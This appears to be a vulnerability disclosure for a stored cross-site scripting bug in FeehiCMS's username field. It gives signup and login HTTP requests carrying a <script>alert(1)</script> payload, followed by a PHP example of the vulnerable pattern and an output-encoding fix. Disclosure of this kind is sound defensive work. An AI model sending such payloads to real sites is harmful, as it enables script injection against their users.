This is a Cross Site Scripting vulnerability. When the user name is <script>alert(1)</script> or JS code, the pop-up alert will be triggered when browsing the post. Details are as follows:
POC example:
registered:
```http
POST /index.php?r=site%2Fsignup HTTP/1.1
Host: demo.cms.feehi.com
Content-Length: 283
Cache-Control: max-age=0
Origin: http://demo.cms.feehi.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://demo.cms.feehi.com/index.php?r=site%2Fsignup
Accept-Encoding: gzip, deflate
Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: Hm_lvt_5c8dd664b2122c4e33710bc08309c5e9=1572536291; Hm_lvt_949aa9449254cd665295a150d530d9c1=1572536091,1572583297; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1572583297; _csrf_backend=587536836a78f5b1b93c7e038d97a0a6af03f097ff9cc90b328fe261e1541b74a%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22B3bX5mvAJKkAKwrO2ZxHinLa343w9ogL%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1572536077,1572582746,1572600883,1572600906; BACKEND_FEEHICMS=km3devogu3n3qvlsenfne27eec; _csrf=b19e3b1d941ce5196dd37924e05ac94fe2ace87f75a732fe96ce4d102789e664a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%221hgfXZdTQZmZKNxHE4MuEXGWHd2_uDtF%22%3B%7D; PHPSESSID=u69rgiksidqnl78r4n9g45frfn; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1572601317
Connection: close

_csrf=gTY-NUvHDzoCLFGO7L9d7f4Mtqn3QkRnFFv0yq8jpF6wXllTE51rblN2PNSn8SWluzj73LIaAzBcP8aV2mfQGA%3D%3D&SignupForm%5Busername%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&SignupForm%5Bemail%5D=12345678%40qq.com&SignupForm%5Bpassword%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&signup-button=
```
login:
```http
POST /index.php?r=site%2Flogin HTTP/1.1
Host: demo.cms.feehi.com
Content-Length: 296
Cache-Control: max-age=0
Origin: http://demo.cms.feehi.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://demo.cms.feehi.com/index.php?r=site%2Flogin
Accept-Encoding: gzip, deflate
Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: Hm_lvt_5c8dd664b2122c4e33710bc08309c5e9=1572536291; Hm_lvt_949aa9449254cd665295a150d530d9c1=1572536091,1572583297; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1572583297; _csrf_backend=587536836a78f5b1b93c7e038d97a0a6af03f097ff9cc90b328fe261e1541b74a%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22B3bX5mvAJKkAKwrO2ZxHinLa343w9ogL%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1572536077,1572582746,1572600883,1572600906; BACKEND_FEEHICMS=km3devogu3n3qvlsenfne27eec; _csrf=b19e3b1d941ce5196dd37924e05ac94fe2ace87f75a732fe96ce4d102789e664a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%221hgfXZdTQZmZKNxHE4MuEXGWHd2_uDtF%22%3B%7D; PHPSESSID=u69rgiksidqnl78r4n9g45frfn; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1572601432
Connection: close

_csrf=DNiLSKN3vY4TpWeADWU7igas1i5rCbMJ-ewQrKYUQJg9sOwu-y3Z2kL_CtpGK0PCQ5ibWy5R9F6xiCLz01A03g%3D%3D&LoginForm%5Busername%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&LoginForm%5Bpassword%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&LoginForm%5BrememberMe%5D=0&LoginForm%5BrememberMe%5D=1&login-button=
```
View post:
How to fix: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
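The output-encoding fix that the linked cheat sheet recommends, shown beside the vulnerable pattern as an added example. This is not FeehiCMS code: the function names and the username allow-list are assumptions made for illustration, and the sample value is the username from the signup request above.

```php
<?php
// Added example, not code from the FeehiCMS project.
// renderAuthorUnsafe, renderAuthorSafe and isValidUsername are hypothetical helpers.

// Vulnerable pattern: the stored username is concatenated into the page as-is,
// so any markup it contains is parsed by the browser of whoever views the post.
function renderAuthorUnsafe(string $username): string
{
    return '<span class="author">' . $username . '</span>';
}

// Hardened pattern: encode at output time for the HTML context.
// ENT_QUOTES also covers attribute values; ENT_SUBSTITUTE replaces invalid
// byte sequences instead of returning an empty string.
function renderAuthorSafe(string $username): string
{
    $encoded = htmlspecialchars($username, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<span class="author">' . $encoded . '</span>';
}

// Defense in depth at signup: accept only letters, digits, '_', '.' and '-'
// (3 to 32 characters). This allow-list is an assumption, not the project's rule,
// and it does not replace output encoding.
function isValidUsername(string $username): bool
{
    return preg_match('/\A[\p{L}\p{N}_.-]{3,32}\z/u', $username) === 1;
}

// Username value taken from the signup request in the report.
$stored = '<script>alert(1)</script>';

echo renderAuthorUnsafe($stored), PHP_EOL; // markup reaches the browser intact
echo renderAuthorSafe($stored), PHP_EOL;   // markup is rendered as inert text
var_dump(isValidUsername($stored));        // rejected at registration
var_dump(isValidUsername('alice_01'));     // constructed benign username
```

Encoding belongs at every place the username is written into a page, since values stored before a validation rule existed remain in the database.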
fix username xss vulnerability tnx